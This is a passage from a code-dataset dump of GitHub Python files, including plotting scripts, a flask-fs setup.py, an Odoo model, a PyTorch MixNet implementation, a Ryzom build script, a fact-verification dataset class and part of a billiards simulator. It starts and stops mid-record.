plt.savefig('./fig/'+name+'.pdf')\n plt.show()\n\n\n\nif __name__ == 
'__main__':\n gpei_file = './data/parameter_importance/lenscale-gpei.csv'\n saas_file = './data/parameter_importance/lenscale-saas.csv'\n box(gpei_file, saas_file, 'lengthscales')\n\n","repo_name":"inamoto85/BOPlanner","sub_path":"results/importance_boxplot.py","file_name":"importance_boxplot.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71725646644","text":"# Sketch the feasible set of problem2 in ./asset/homework_2.PDF\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 利用sin,cos函数画圆\n# 利用fill()函数填充图形区域\na_x = np.arange(0, 2 * np.pi, 0.01)\na = 1 + 1 * np.cos(a_x)\nb = 1 + 1 * np.sin(a_x)\nplt.plot(a, b, color='b', linestyle='-', label=r'$(x_1-1)^2+(x_2-1)^2 ≤ 1$')\nplt.fill(a, b, color='b')\nplt.plot(a, -b, color='purple', linestyle='-', label=r'$(x_1-1)^2+(x_2+1)^2 ≤ 1$')\nplt.fill(a, -b, color='purple')\n\na = 0.8 * np.cos(a_x)\nb = 0.8 * np.sin(a_x)\nplt.plot(a, b, linestyle='-.', label=r'$p = 0.8$')\n\na = 1.2 * np.cos(a_x)\nb = 1.2 * np.sin(a_x)\nplt.plot(a, b, linestyle='-.', label=r'$p = 1.2$')\n\na = 1.6 * np.cos(a_x)\nb = 1.6 * np.sin(a_x)\nplt.plot(a, b, linestyle='-.', label=r'$p = 1.6$')\n\nplt.axvline(0, color='black')\nplt.axhline(0, color='black')\nplt.plot(0, 0, '.')\nplt.plot(1, 0, '.', color='r')\n\nplt.annotate('feasible point', xy=(1, 0), xytext=(+30, -30), textcoords='offset points', fontsize=10,\n arrowprops=dict(arrowstyle='->', connectionstyle='arc3,rad=.0'))\n\nplt.ylim(-3, 5)\nplt.xlim(-3, 5)\nplt.legend()\nplt.show()\n","repo_name":"yi212212/optimal_homework2","sub_path":"problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4041393403","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport re\n\nfrom os.path import join, dirname\n\nfrom setuptools import setup, find_packages\n\nROOT = dirname(__file__)\n\nRE_REQUIREMENT = re.compile(r'^\\s*-r\\s*(?P.*)$')\n\nPYPI_RST_FILTERS = (\n # Replace code-blocks\n (r'\\.\\.\\s? code-block::\\s*(\\w|\\+)+', '::'),\n # Remove all badges\n (r'\\.\\. 
image:: .*', ''),\n (r' :target: .*', ''),\n (r' :alt: .*', ''),\n)\n\n\ndef rst(filename):\n '''\n Load rst file and sanitize it for PyPI.\n Remove unsupported github tags:\n - code-block directive\n - all badges\n '''\n content = open(filename).read()\n for regex, replacement in PYPI_RST_FILTERS:\n content = re.sub(regex, replacement, content)\n return content\n\n\ndef pip(filename):\n \"\"\"Parse pip reqs file and transform it to setuptools requirements.\"\"\"\n requirements = []\n for line in open(join(ROOT, 'requirements', filename)):\n line = line.strip()\n if not line or '://' in line:\n continue\n match = RE_REQUIREMENT.match(line)\n if match:\n requirements.extend(pip(match.group('filename')))\n else:\n requirements.append(line)\n return requirements\n\n\nlong_description = '\\n'.join((\n rst('README.rst'),\n rst('CHANGELOG.rst'),\n ''\n))\n\ns3_require = pip('s3.pip')\nswift_require = pip('swift.pip')\ngridfs_require = pip('gridfs.pip')\nall_require = s3_require + swift_require + gridfs_require\ntests_require = pip('test.pip') + all_require\ndoc_require = pip('doc.pip')\ndev_require = tests_require + ['invoke', 'tox', 'sphinx', 'alabaster']\n\nsetup(\n name='flask-fs',\n version=__import__('flask_fs').__version__,\n description=__import__('flask_fs').__description__,\n long_description=long_description,\n url='https://github.com/noirbizarre/flask-fs',\n download_url='http://pypi.python.org/pypi/flask-fs',\n author='Axel Haustant',\n author_email='noirbizarre@gmail.com',\n packages=find_packages(),\n include_package_data=True,\n install_requires=pip('install.pip'),\n tests_require=tests_require,\n extras_require={\n 'doc': doc_require,\n 'test': tests_require,\n 's3': s3_require,\n 'swift': swift_require,\n 'gridfs': gridfs_require,\n 'all': all_require,\n 'test': tests_require,\n 'dev': dev_require,\n },\n license='MIT',\n use_2to3=True,\n zip_safe=False,\n keywords='',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python',\n 'Environment :: Web Environment',\n 'Operating System :: OS Independent',\n 'Intended Audience :: Developers',\n 'Topic :: System :: Software Distribution',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'License :: OSI Approved :: MIT License',\n ],\n)\n","repo_name":"Cloudxtreme/flask-fs","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"6089266121","text":"from odoo import models\n\n\nclass IotDeviceInput(models.Model):\n\n _inherit = \"iot.device.input\"\n\n def get_options(self):\n data = {}\n for option in self.device_id.option_ids:\n data[option.property_id.tech_name] = getattr(\n option, option.field_name, False\n )\n if (\n option.field_type == \"bool\"\n and option.property_id.is_action\n and option.value_bool\n ):\n option.value_bool = False\n return data\n","repo_name":"OCA/iot","sub_path":"iot_option_oca/models/iot_device_input.py","file_name":"iot_device_input.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"76"} +{"seq_id":"72564756084","text":"# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n# LightNet++: Boosted Light-weighted 
Networks for Real-time Semantic Segmentation\n# ---------------------------------------------------------------------------------------------------------------- #\n# PyTorch implementation for MixNet\n# class:\n# > Swish\n# > SEBlock\n# > GPConv\n# > MDConv\n# > MixDepthBlock\n# > MixNet(S, M, L)\n# ---------------------------------------------------------------------------------------------------------------- #\n# Author: Huijun Liu M.Sc.\n# Date: 15.02.2020\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\nfrom torch.nn import functional as F\nfrom collections import OrderedDict\n\nfrom torch import nn\nimport torch\nimport math\n\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n# Swish: Swish Activation Function\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\nclass Swish(nn.Module):\n def __init__(self, inplace=True):\n super(Swish, self).__init__()\n self.inplace = inplace\n\n def forward(self, x):\n return x.mul_(x.sigmoid()) if self.inplace else x.mul(x.sigmoid())\n\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n# SEBlock: Squeeze & Excitation (SCSE)\n# namely, Channel-wise Attention\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\nclass SEBlock(nn.Module):\n def __init__(self, in_planes, reduced_dim, act_type=\"swish\"):\n super(SEBlock, self).__init__()\n self.channel_se = nn.Sequential(OrderedDict([\n (\"linear1\", nn.Conv2d(in_planes, reduced_dim, kernel_size=1, stride=1, padding=0, bias=True)),\n (\"act\", Swish(inplace=True) if act_type == \"swish\" else nn.ReLU(inplace=True)),\n (\"linear2\", nn.Conv2d(reduced_dim, in_planes, kernel_size=1, stride=1, padding=0, bias=True))\n ]))\n\n def forward(self, x):\n x_se = torch.sigmoid(self.channel_se(F.adaptive_avg_pool2d(x, output_size=(1, 1))))\n return torch.mul(x, x_se)\n\n\nclass ConvBlock(nn.Module):\n def __init__(self, in_planes, out_planes, kernel_size, stride=1,\n groups=1, dilate=1, act_type=\"swish\"):\n\n super(ConvBlock, self).__init__()\n assert stride in [1, 2]\n dilate = 1 if stride > 1 else dilate\n padding = ((kernel_size - 1) // 2) * dilate\n\n self.conv_block = nn.Sequential(OrderedDict([\n (\"conv\", nn.Conv2d(in_channels=in_planes, out_channels=out_planes,\n kernel_size=kernel_size, stride=stride, padding=padding,\n dilation=dilate, groups=groups, bias=False)),\n (\"norm\", nn.BatchNorm2d(num_features=out_planes,\n eps=1e-3, momentum=0.01)),\n (\"act\", Swish(inplace=True) if act_type == \"swish\" else nn.ReLU(inplace=True))\n ]))\n\n def forward(self, x):\n return self.conv_block(x)\n\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n# GPConv: Grouped Point-wise Convolution for MixDepthBlock\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\nclass GPConv(nn.Module):\n def __init__(self, in_planes, out_planes, kernel_sizes):\n super(GPConv, self).__init__()\n self.num_groups = len(kernel_sizes)\n assert in_planes % self.num_groups == 0\n sub_in_dim = in_planes // self.num_groups\n sub_out_dim = out_planes // self.num_groups\n\n self.group_point_wise = nn.ModuleList()\n for _ in kernel_sizes:\n self.group_point_wise.append(nn.Conv2d(sub_in_dim, sub_out_dim,\n kernel_size=1, stride=1, padding=0,\n groups=1, dilation=1, bias=False))\n\n def forward(self, x):\n if self.num_groups == 1:\n return self.group_point_wise[0](x)\n\n chunks = torch.chunk(x, chunks=self.num_groups, dim=1)\n mix = 
[self.group_point_wise[stream](chunks[stream]) for stream in range(self.num_groups)]\n return torch.cat(mix, dim=1)\n\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n# MDConv: Mixed Depth-wise Convolution for MixDepthBlock\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\nclass MDConv(nn.Module):\n def __init__(self, in_planes, kernel_sizes, stride=1, dilate=1):\n super(MDConv, self).__init__()\n self.num_groups = len(kernel_sizes)\n assert in_planes % self.num_groups == 0\n sub_hidden_dim = in_planes // self.num_groups\n\n assert stride in [1, 2]\n dilate = 1 if stride > 1 else dilate\n\n self.mixed_depth_wise = nn.ModuleList()\n for kernel_size in kernel_sizes:\n padding = ((kernel_size - 1) // 2) * dilate\n self.mixed_depth_wise.append(nn.Conv2d(sub_hidden_dim, sub_hidden_dim,\n kernel_size=kernel_size, stride=stride, padding=padding,\n groups=sub_hidden_dim, dilation=dilate, bias=False))\n\n def forward(self, x):\n if self.num_groups == 1:\n return self.mixed_depth_wise[0](x)\n\n chunks = torch.chunk(x, chunks=self.num_groups, dim=1)\n mix = [self.mixed_depth_wise[stream](chunks[stream]) for stream in range(self.num_groups)]\n return torch.cat(mix, dim=1)\n\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n# MixDepthBlock: MixDepthBlock for MixNet\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\nclass MixDepthBlock(nn.Module):\n def __init__(self, in_planes, out_planes,\n expand_ratio, exp_kernel_sizes, kernel_sizes, poi_kernel_sizes, stride, dilate,\n reduction_ratio=4, dropout_rate=0.2, act_type=\"swish\"):\n super(MixDepthBlock, self).__init__()\n self.dropout_rate = dropout_rate\n self.expand_ratio = expand_ratio\n\n self.groups = len(kernel_sizes)\n self.use_se = (reduction_ratio is not None) and (reduction_ratio > 1)\n self.use_residual = in_planes == out_planes and stride == 1\n\n assert stride in [1, 2]\n dilate = 1 if stride > 1 else dilate\n hidden_dim = in_planes * expand_ratio\n\n # step 1. Expansion phase/Point-wise convolution\n if expand_ratio != 1:\n self.expansion = nn.Sequential(OrderedDict([\n (\"conv\", GPConv(in_planes, hidden_dim, kernel_sizes=exp_kernel_sizes)),\n (\"norm\", nn.BatchNorm2d(hidden_dim, eps=1e-3, momentum=0.01)),\n (\"act\", Swish(inplace=True) if act_type == \"swish\" else nn.ReLU(inplace=True))\n ]))\n\n # step 2. Depth-wise convolution phase\n self.depth_wise = nn.Sequential(OrderedDict([\n (\"conv\", MDConv(hidden_dim, kernel_sizes=kernel_sizes, stride=stride, dilate=dilate)),\n (\"norm\", nn.BatchNorm2d(hidden_dim, eps=1e-3, momentum=0.01)),\n (\"act\", Swish(inplace=True) if act_type == \"swish\" else nn.ReLU(inplace=True))\n ]))\n\n # step 3. Squeeze and Excitation\n if self.use_se:\n reduced_dim = max(1, int(in_planes / reduction_ratio))\n self.se_block = SEBlock(hidden_dim, reduced_dim, act_type=act_type)\n\n # step 4. Point-wise convolution phase\n self.point_wise = nn.Sequential(OrderedDict([\n (\"conv\", GPConv(hidden_dim, out_planes, kernel_sizes=poi_kernel_sizes)),\n (\"norm\", nn.BatchNorm2d(out_planes, eps=1e-3, momentum=0.01))\n ]))\n\n def forward(self, x):\n res = x\n\n # step 1. Expansion phase/Point-wise convolution\n if self.expand_ratio != 1:\n x = self.expansion(x)\n\n # step 2. Depth-wise convolution phase\n x = self.depth_wise(x)\n\n # step 3. Squeeze and Excitation\n if self.use_se:\n x = self.se_block(x)\n\n # step 4. Point-wise convolution phase\n x = self.point_wise(x)\n\n # step 5. 
Skip connection and drop connect\n if self.use_residual:\n if self.training and (self.dropout_rate is not None):\n x = F.dropout2d(input=x, p=self.dropout_rate,\n training=self.training, inplace=True)\n x = x + res\n\n return x\n\n\nclass MixNet(nn.Module):\n def __init__(self, arch=\"s\", num_classes=1000):\n super(MixNet, self).__init__()\n\n params = {\n 's': (16, [\n # t, c, n, k, ek, pk, s, d, a, se\n [1, 16, 1, [3], [1], [1], 1, 1, \"relu\", None],\n [6, 24, 1, [3], [1, 1], [1, 1], 2, 1, \"relu\", None],\n [3, 24, 1, [3], [1, 1], [1, 1], 1, 1, \"relu\", None],\n [6, 40, 1, [3, 5, 7], [1], [1], 2, 1, \"swish\", 2],\n [6, 40, 3, [3, 5], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [6, 80, 1, [3, 5, 7], [1], [1, 1], 2, 1, \"swish\", 4],\n [6, 80, 2, [3, 5], [1], [1, 1], 1, 1, \"swish\", 4],\n [6, 120, 1, [3, 5, 7], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [3, 120, 2, [3, 5, 7, 9], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [6, 200, 1, [3, 5, 7, 9, 11], [1], [1], 2, 1, \"swish\", 2],\n [6, 200, 2, [3, 5, 7, 9], [1], [1, 1], 1, 1, \"swish\", 2]\n ], 1.0, 1.0, 0.2),\n 'm': (24, [\n # t, c, n, k, ek, pk, s, d, a, se\n [1, 24, 1, [3], [1], [1], 1, 1, \"relu\", None],\n [6, 32, 1, [3, 5, 7], [1, 1], [1, 1], 2, 1, \"relu\", None],\n [3, 32, 1, [3], [1, 1], [1, 1], 1, 1, \"relu\", None],\n [6, 40, 1, [3, 5, 7, 9], [1], [1], 2, 1, \"swish\", 2],\n [6, 40, 3, [3, 5], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [6, 80, 1, [3, 5, 7], [1], [1], 2, 1, \"swish\", 4],\n [6, 80, 3, [3, 5, 7, 9], [1, 1], [1, 1], 1, 1, \"swish\", 4],\n [6, 120, 1, [3], [1], [1], 1, 1, \"swish\", 2],\n [3, 120, 3, [3, 5, 7, 9], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [6, 200, 1, [3, 5, 7, 9], [1], [1], 2, 1, \"swish\", 2],\n [6, 200, 3, [3, 5, 7, 9], [1], [1, 1], 1, 1, \"swish\", 2]\n ], 1.0, 1.0, 0.25),\n 'l': (24, [\n # t, c, n, k, ek, pk, s, d, a, se\n [1, 24, 1, [3], [1], [1], 1, 1, \"relu\", None],\n [6, 32, 1, [3, 5, 7], [1, 1], [1, 1], 2, 1, \"relu\", None],\n [3, 32, 1, [3], [1, 1], [1, 1], 1, 1, \"relu\", None],\n [6, 40, 1, [3, 5, 7, 9], [1], [1], 2, 1, \"swish\", 2],\n [6, 40, 3, [3, 5], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [6, 80, 1, [3, 5, 7], [1], [1], 2, 1, \"swish\", 4],\n [6, 80, 3, [3, 5, 7, 9], [1, 1], [1, 1], 1, 1, \"swish\", 4],\n [6, 120, 1, [3], [1], [1], 1, 1, \"swish\", 2],\n [3, 120, 3, [3, 5, 7, 9], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [6, 200, 1, [3, 5, 7, 9], [1], [1], 2, 1, \"swish\", 2],\n [6, 200, 3, [3, 5, 7, 9], [1], [1, 1], 1, 1, \"swish\", 2]\n ], 1.3, 1.0, 0.25),\n }\n\n stem_planes, settings, width_multi, depth_multi, self.dropout_rate = params[arch]\n out_channels = self._round_filters(stem_planes, width_multi)\n self.mod1 = ConvBlock(3, out_channels, kernel_size=3, stride=2,\n groups=1, dilate=1, act_type=\"relu\")\n\n in_channels = out_channels\n drop_rate = self.dropout_rate\n mod_id = 0\n for t, c, n, k, ek, pk, s, d, a, se in settings:\n out_channels = self._round_filters(c, width_multi)\n repeats = self._round_repeats(n, depth_multi)\n\n if self.dropout_rate:\n drop_rate = self.dropout_rate * float(mod_id+1) / len(settings)\n\n # Create blocks for module\n blocks = []\n for block_id in range(repeats):\n stride = s if block_id == 0 else 1\n dilate = d if stride == 1 else 1\n\n blocks.append((\"block%d\" % (block_id + 1), MixDepthBlock(in_channels, out_channels,\n expand_ratio=t, exp_kernel_sizes=ek,\n kernel_sizes=k, poi_kernel_sizes=pk,\n stride=stride, dilate=dilate,\n reduction_ratio=se,\n dropout_rate=drop_rate,\n act_type=a)))\n\n in_channels = out_channels\n self.add_module(\"mod%d\" % 
(mod_id + 2), nn.Sequential(OrderedDict(blocks)))\n mod_id += 1\n\n self.last_channels = 1536\n self.last_feat = ConvBlock(in_channels, self.last_channels,\n kernel_size=1, stride=1,\n groups=1, dilate=1, act_type=\"relu\")\n\n self.classifier = nn.Linear(self.last_channels, num_classes)\n\n self._initialize_weights()\n\n def _initialize_weights(self):\n # weight initialization\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not None:\n nn.init.zeros_(m.bias)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.ones_(m.weight)\n nn.init.zeros_(m.bias)\n elif isinstance(m, nn.Linear):\n fan_out = m.weight.size(0)\n init_range = 1.0 / math.sqrt(fan_out)\n nn.init.uniform_(m.weight, -init_range, init_range)\n if m.bias is not None:\n nn.init.zeros_(m.bias)\n\n @staticmethod\n def _make_divisible(value, divisor=8):\n new_value = max(divisor, int(value + divisor / 2) // divisor * divisor)\n if new_value < 0.9 * value:\n new_value += divisor\n return new_value\n\n def _round_filters(self, filters, width_multi):\n if width_multi == 1.0:\n return filters\n return int(self._make_divisible(filters * width_multi))\n\n @staticmethod\n def _round_repeats(repeats, depth_multi):\n if depth_multi == 1.0:\n return repeats\n return int(math.ceil(depth_multi * repeats))\n\n def forward(self, x):\n x = self.mod2(self.mod1(x)) # (N, C, H/2, W/2)\n x = self.mod4(self.mod3(x)) # (N, C, H/4, W/4)\n x = self.mod6(self.mod5(x)) # (N, C, H/8, W/8)\n x = self.mod10(self.mod9(self.mod8(self.mod7(x)))) # (N, C, H/16, W/16)\n x = self.mod12(self.mod11(x)) # (N, C, H/32, W/32)\n x = self.last_feat(x)\n\n x = F.adaptive_avg_pool2d(x, (1, 1)).view(-1, self.last_channels)\n if self.training and (self.dropout_rate is not None):\n x = F.dropout(input=x, p=self.dropout_rate,\n training=self.training, inplace=True)\n x = self.classifier(x)\n return x\n\n\nif __name__ == \"__main__\":\n import os\n import time\n from torchstat import stat\n from pytorch_memlab import MemReporter\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n arch = \"l\"\n img_preparam = {\"s\": (224, 0.875), \"m\": (224, 0.875), \"l\": (224, 0.875)}\n net_h = img_preparam[arch][0]\n model = MixNet(arch=arch, num_classes=1000)\n optimizer = torch.optim.SGD(model.parameters(), lr=1e-1,\n momentum=0.90, weight_decay=1.0e-4, nesterov=True)\n \n # stat(model, (3, net_h, net_h))\n\n model = model.cuda().train()\n loss_func = nn.CrossEntropyLoss().cuda()\n dummy_in = torch.randn(2, 3, net_h, net_h).cuda().requires_grad_()\n dummy_target = torch.ones(2).cuda().long().cuda()\n reporter = MemReporter(model)\n \n optimizer.zero_grad()\n dummy_out = model(dummy_in)\n loss = loss_func(dummy_out, dummy_target)\n print('========================================== before backward ===========================================')\n reporter.report()\n \n loss.backward()\n optimizer.step()\n print('========================================== after backward =============================================')\n reporter.report()\n","repo_name":"linksense/MixNet-PyTorch","sub_path":"mixnet.py","file_name":"mixnet.py","file_ext":"py","file_size_in_byte":16947,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"76"} +{"seq_id":"18949524110","text":"T = int(input())\n\nfor tc in range(1, 1+T):\n N = int(input())\n\n nums = []\n red = set()\n blue = set()\n\n # 칠할 영역\n for _ in range(N):\n nums.append(list(map(int, input().split())))\n\n for i in nums:\n # 색상이 빨강이라면\n if i[-1] 
== 1:\n # 두 점 사이에 있는 좌표를 set 에 저장\n for j in range(i[0], i[2]+1):\n for k in range(i[1], i[3]+1):\n red.add((j, k))\n\n # 파랑일 때\n else:\n for j in range(i[0], i[2]+1):\n for k in range(i[1], i[3]+1):\n blue.add((j, k))\n\n # 빨강과 파랑의 교집합의 수를 출력\n print(f'#{tc} ', end='')\n print(len(red & blue))","repo_name":"LeeHyunJin1997/Algorithm","sub_path":"SWEA/D2/4836.py","file_name":"4836.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72535009525","text":"import time, sys, os, shutil, subprocess, distutils.dir_util\nsys.path.append(\"../../configuration\")\n\nif os.path.isfile(\"log.log\"):\n\tos.remove(\"log.log\")\nlog = open(\"log.log\", \"w\")\nfrom scripts import *\nfrom buildsite import *\nfrom process import *\nfrom tools import *\nfrom directories import *\n\nprintLog(log, \"\")\nprintLog(log, \"-------\")\nprintLog(log, \"--- Build ligo\")\nprintLog(log, \"-------\")\nprintLog(log, time.strftime(\"%Y-%m-%d %H:%MGMT\", time.gmtime(time.time())))\nprintLog(log, \"\")\n\nif LigoExportLand != \"\":\n\tExecTimeout = findTool(log, ToolDirectories, ExecTimeoutTool, ToolSuffix)\n\tLandExport = findTool(log, ToolDirectories, LandExportTool, ToolSuffix)\n\n\tprintLog(log, \">>> Generate ligo zone <<<\")\n\tif LandExport == \"\":\n\t\ttoolLogFail(log, LandExportTool, ToolSuffix)\n\telif ExecTimeout == \"\":\n\t\ttoolLogfail(log, ExecTimeoutTool, ToolSuffix)\n\telse:\n\t\tsubprocess.call([ ExecTimeout, str(LigoExportTimeout), LandExport, ActiveProjectDirectory + \"/generated/land_exporter.cfg\" ])\n\n\tprintLog(log, \">>> Copy to zone builder <<<\")\n\tdirSource = ExportBuildDirectory + \"/\" + LigoZoneBuildDirectory\n\tdirTarget = ExportBuildDirectory + \"/\" + ZoneExportDirectory\n\tmkPath(log, dirSource)\n\tmkPath(log, dirTarget)\n\tcopyFilesExtReplaceNoTreeIfNeeded(log, dirSource, dirTarget, \".zonel\", \".zone\")\n\tcopyFilesExtNoTreeIfNeeded(log, dirSource, dirTarget, \".zonenh\")\n\nlog.close()\n\n\n# end of file\n","repo_name":"ryzom/ryzomcore","sub_path":"nel/tools/build_gamedata/processes/ligo/2_build.py","file_name":"2_build.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":307,"dataset":"github-code","pt":"76"} +{"seq_id":"3436530688","text":"import torch\nfrom torch.utils.data import Dataset\nimport pandas as pd\n\nclass WikiDataset(Dataset):\n def __init__(self,\n ds_csv='train_balanced_10000_samples.csv',\n transform=None):\n \n self.ds_csv = pd.read_csv(ds_csv)\n self.transform = transform\n \n def __len__(self):\n return len(self.ds_csv)\n \n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n # handle slices\n if isinstance(idx, slice):\n claims = self.ds_csv.iloc[idx]['claim']\n sents = self.ds_csv.iloc[idx]['sentence']\n targets = self.ds_csv.iloc[idx]['label']\n pointers = zip(claims, sents, targets)\n \n samples = []\n for (claim, sent, target) in pointers:\n sample = {'data': (claim, sent)}\n if self.transform:\n sample = self.transform(sample)\n sample['target'] = self.encoded_label(target)\n samples.append(sample)\n \n if self.transform:\n return self.transform_collate_fn(samples)\n else:\n return self.collate_fn(samples)\n \n # handle single idx & DataLoader batching\n claim = self.ds_csv.iloc[idx]['claim']\n sent = self.ds_csv.iloc[idx]['sentence']\n target = self.ds_csv.iloc[idx]['label']\n \n target = self.encoded_label(target)\n sample = {'data': (claim, sent), 'target': target}\n if 
self.transform:\n sample = self.transform(sample)\n \n return sample\n \n @staticmethod\n def encoded_label(label:str):\n return {'SUPPORTS': 1, 'REFUTES': 0}.get(label)\n\n @staticmethod\n def transform_collate_fn(batch):\n collated = {\n 'input_ids': [], \n 'segments': [],\n 'targets': []\n }\n for sample in batch:\n data = sample['data']\n collated['input_ids'].append(data.get('input_ids'))\n collated['segments'].append(data.get('segments'))\n collated['targets'].append(sample.get('target'))\n \n collated_tensors = WikiDataset.dict_values_to_tensor(collated)\n\n return collated_tensors\n \n @staticmethod\n def collate_fn(batch):\n collated = {\n 'data': [],\n 'targets': []\n }\n for sample in batch:\n collated['data'].append(sample['data'])\n collated['targets'].append(sample['target'])\n return collated\n \n @staticmethod\n def dict_values_to_tensor(dict_:dict):\n for k in dict_:\n dict_[k] = torch.tensor(dict_[k]).long()\n return dict_\n\n\nif __name__ == \"__main__\":\n ds = WikiDataset()","repo_name":"jackhhchan/fact-verification-system","sub_path":"src/pytorch_tutorial/fvs/wiki_datasets.py","file_name":"wiki_datasets.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17300042944","text":"\"\"\"\nAbstractTable module for Dynamical Billiards Simulator\nAll the different tables will be a subclass of this abstract superclass\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import animation\nfrom matplotlib import pyplot as plt\nimport matplotlib.patches as patches\n\nfrom PIL import Image\n\nclass Ball(object):\n \"\"\"Holds the colour and state of a ball in the simulation\"\"\"\n def __init__(self, **kwargs):\n super().__init__()\n self.parameters = kwargs\n self.state = self.parameters['initstate']\n self.color = self.parameters['color']\n\nclass AbstractTable(object):\n \"\"\"\n Abstract class for a table that simulates collisions\n this superclass takes care of the animating and preview generation\n subclasses will take care of detecting collisions and drawing the table\n\n subclasses must implement:\n drawTable\n step\n\n all others are optional\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__()\n self.parameters = kwargs\n self.ballList = []\n self.nBalls = self.parameters['nBalls']\n self.drag = 0.999 # TODO: possibly change this with entrybox\n\n # use colormap for many colors\n self.cmap = plt.cm.get_cmap(\"gist_rainbow\", self.nBalls + 1)\n\n def drawTable(self, ec='none'):\n \"\"\"\n Each table must implement this function\n should make a figure and axes in self and should draw the table as a\n collection of matplotlib patches\n\n edge colour is for the patches, when animating it can be left as none\n but must be 'k' for generatePreview\n \"\"\"\n return None\n\n def step(self, particle, dt):\n \"\"\"\n each table must implement this function\n for each check particle, check if boundaries crossed and update\n velocity (position is updated in stepall)\n \"\"\"\n return None\n\n def stepall(self, dt):\n \"\"\"\n updates position of each ball and checks boundaries using step\n \"\"\"\n for particle in self.ballList:\n if self.parameters['friction']:\n particle.state[2] *= self.drag\n particle.state[3] *= self.drag\n particle.state[0] += dt * particle.state[2]\n particle.state[1] += dt * particle.state[3]\n\n self.step(particle, dt)\n\n def generatePreview(self):\n \"\"\"\n saves a preview of the figure as preview.png and returns a PIL image\n object of the 
preview\n\n must run update before using this method\n \"\"\"\n # draw table with black edge color\n self.drawTable('k')\n balls=[]\n # initialize all the balls and their positions\n for i in range(self.nBalls):\n balls.append(Ball(color=self.cmap(i),\n initstate=self.parameters['balls'][i]))\n self.ax.plot(balls[i].state[0], balls[i].state[1],\n color=self.cmap(i), marker = 'o', ms=8)\n # plot arrow indicating velocity vector\n self.ax.add_patch(patches.Arrow(balls[i].state[0], balls[i].state[1], balls[i].state[2]*0.3,\n balls[i].state[3]*0.3, width=0.05, ls='-', color=self.cmap(i)))\n\n # linewidth needs to be larger than animating so it will be visible in\n # the preview\n self.table.set_linewidth(6)\n\n self.fig.savefig('preview.png')\n f=Image.open('preview.png')\n # resize object so it will fit in tkinter canvas\n f=f.resize((300,300))\n return f\n\n def update(self, **kwargs):\n \"\"\"saves new parameters for the Simulation\"\"\"\n self.parameters = kwargs\n\n def main(self,frames=600):\n \"\"\"\n opens the matplotlib window and starts the animation\n should run update before calling with function\n \"\"\"\n # close any figures made from generatePreview\n plt.close('all')\n # make figure and axis and add the table to it\n self.drawTable()\n # define time step. this value seems to work well but can be adjusted\n dt = 1 / 30\n\n # initialize balls and axes objects\n particles = []\n paths = []\n self.pathx = {}\n self.pathy = {}\n\n for i in range(self.nBalls):\n # make ball object and add it to ball list\n self.ballList.append(Ball(color=self.cmap(i), initstate=self.parameters['balls'][i]))\n\n # initialize particles and paths that will be plotted\n\n particles.append(self.ax.plot([], [], color=self.cmap(i), marker='o', ms=6)[0])\n paths.append(self.ax.plot([], [], color=self.cmap(i), ls='-', lw=1)[0])\n self.pathx[i] = np.array([])\n self.pathy[i] = np.array([])\n\n def init():\n \"\"\"\n initialize function for the animation.\n gets run before each frame.\n \"\"\"\n # reset particles\n for ball in particles:\n ball.set_data([], [])\n ball.set_data([], [])\n # reset table\n self.table.set_edgecolor('none')\n return tuple(particles) + (self.table,) + tuple(paths)\n\n def animate(k):\n \"\"\"perform animation step\"\"\"\n # trace the particle if check box is selected\n if self.parameters['trace']:\n for 